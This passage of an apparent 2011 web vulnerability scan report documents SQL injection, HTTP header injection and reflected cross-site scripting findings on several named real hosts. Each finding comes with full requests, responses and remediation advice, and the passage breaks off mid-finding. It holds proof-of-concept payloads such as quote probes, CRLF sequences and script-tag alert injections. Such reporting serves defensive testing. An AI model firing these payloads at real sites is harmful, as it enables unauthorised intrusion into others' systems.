There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/util/componentrenderpage/component-id/?1%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:47:01 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 35883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> An Unexpecte
...[SNIP]...
<div class="exception-page-message RuntimeException lia-component-content" class="exception-page-message RuntimeException">
...[SNIP]...
<li>
           Sorry, your request failed. A notification has been sent to the development team for investigation.<p>
...[SNIP]...

Request 2

GET /t5/util/componentrenderpage/component-id/?1%2527%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:47:02 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.49. http://search2.skype.com/search/search.cgi [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://search2.skype.com
Path:   /search/search.cgi

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /search/search.cgi?query=xss&collection=skype-en&1'=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: search2.skype.com
Cookie: skype-session-token=94fd441852b9e1046c98536f973599d688791fc3; SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 18:17:41 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39998

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<!-- Meta -->
<meta cha
...[SNIP]...
<!-- Padre error status: 2 -->
...[SNIP]...

Request 2

GET /search/search.cgi?query=xss&collection=skype-en&1''=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: search2.skype.com
Cookie: skype-session-token=94fd441852b9e1046c98536f973599d688791fc3; SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 18:17:43 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40007

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<!-- Meta -->
<meta cha
...[SNIP]...

2. HTTP header injection
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://142.xg4ken.com/media/redir.php [k_clickid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://142.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the k_clickid request parameter is copied into the Location response header. The payload 27af3%0d%0a1445eb0004d was submitted in the k_clickid parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=6&camp=4190&affcode=kw93350&cid=7516966884&networkType=search&k_clickid=27af3%0d%0a1445eb0004d&url[]=https%3A%2F%2Fh41183.www4.hp.com%2Finflexion%2F%3Fcountry%3DUS%26language%3DUS%26campaigncode%3Dinflexion%26jumpid%3Dinflexion HTTP/1.1
Host: 142.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 16:18:45 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564; expires=Sat, 03-Dec-2011 16:18:45 GMT; path=/; domain=.xg4ken.com
Location: https://h41183.www4.hp.com/inflexion/?country=US&language=US&campaigncode=inflexion&jumpid=inflexion&k_clickid=27af3
1445eb0004d

P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


2.2. http://142.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://142.xg4ken.com
Path:   /media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 28e5e%0d%0ae9747ada840 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=6&camp=4190&affcode=kw93350&cid=7516966884&networkType=search&k_clickid=AMS|_kenshoo_clickid_&url[]=https%3A%2F%2Fh41183.www4.hp.com%2Finflexion%2F%3Fcountry%3DUS%26language%3DUS%26campaigncode%3Dinflexion%26jumpid%3Dinfle/28e5e%0d%0ae9747ada840xion HTTP/1.1
Host: 142.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 16:18:46 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564; expires=Sat, 03-Dec-2011 16:18:46 GMT; path=/; domain=.xg4ken.com
Location: https://h41183.www4.hp.com/inflexion/?country=US&language=US&campaigncode=inflexion&jumpid=infle/28e5e
e9747ada840
xion&k_clickid=AMS|200d2a28-23e9-a048-8372-00005235d564
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


3. Cross-site scripting (reflected)
There are 135 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75be5"><script>alert(1)</script>698f01d1a56 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=75be5"><script>alert(1)</script>698f01d1a56&r=1662255836 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.lijit.com/beacon?viewId=13151898879098e79e1e7e81d&rand=1315189887909&uri=http://www.lijit.com/users/w3schools&informer=7846666&type=fpads&loc=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&rr=http%3A//www.w3schools.com/js/tryit.asp%3Ffilename%3Dtryjs_text&ifr=1&v=1.0&csync=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; uid=6981940571811189480

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 02:30:53 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=6981940571811189480&rnd=2866977535605027834&fpid=75be5"><script>alert(1)</script>698f01d1a56&nu=n&t=&sp=n&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.2. http://afe.specificclick.net/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85163'-alert(1)-'d48efb024f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?l=19240&sz=728x90&wr=j&t=j&u=&r=&rnd=615455&pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D&85163'-alert(1)-'d48efb024f=1 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=76ca32722d97e66b629c0f8c67ac; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:30:58 GMT
Content-Length: 1285

document.write('<iframe src="http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223059;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8y
...[SNIP]...
53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D&85163'-alert(1)-'d48efb024f=1" width="728" height="90" border="0" frameborder="0" marginwidth="0" marginheight="0" hspace="0" vspace="0" scrolling="NO">
...[SNIP]...

3.3. http://afe.specificclick.net/ [pasmc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The value of the pasmc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8ced'-alert(1)-'3b0145e93ed was submitted in the pasmc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?l=19240&sz=728x90&wr=j&t=j&u=&r=&rnd=615455&pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3Dc8ced'-alert(1)-'3b0145e93ed HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=76ca26641b15176f9bf898619800; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:30:58 GMT
Content-Length: 1283

document.write('<iframe src="http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223058;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8y
...[SNIP]...
y53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3Dc8ced'-alert(1)-'3b0145e93ed" width="728" height="90" border="0" frameborder="0" marginwidth="0" marginheight="0" hspace="0" vspace="0" scrolling="NO">
...[SNIP]...

3.4. http://afe.specificclick.net/serve/v=5 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 508d9'-alert(1)-'a737bccdbe7 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D508d9'-alert(1)-'a737bccdbe7 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=76c8b6bd9362121274a3e06817e9

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=76d09f72564970422799112b38d3; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:31:24 GMT
Vary: Accept-Encoding
Content-Length: 2743
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
y53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D508d9'-alert(1)-'a737bccdbe7http://clk.atdmt.com/CNT/go/334305255/direct/01/1315189885" target="_blank">
...[SNIP]...

3.5. http://afe.specificclick.net/serve/v=5 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The value of the m request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e718"><script>alert(1)</script>08a95dd801e was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D7e718"><script>alert(1)</script>08a95dd801e HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=76c8b6bd9362121274a3e06817e9

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:31:21 GMT
Vary: Accept-Encoding
Content-Length: 2788
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
y53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D7e718"><script>alert(1)</script>08a95dd801e" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">
...[SNIP]...

3.6. http://afe.specificclick.net/serve/v=5 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The value of the m request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39c75"><script>alert(1)</script>0189dd8aea9 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

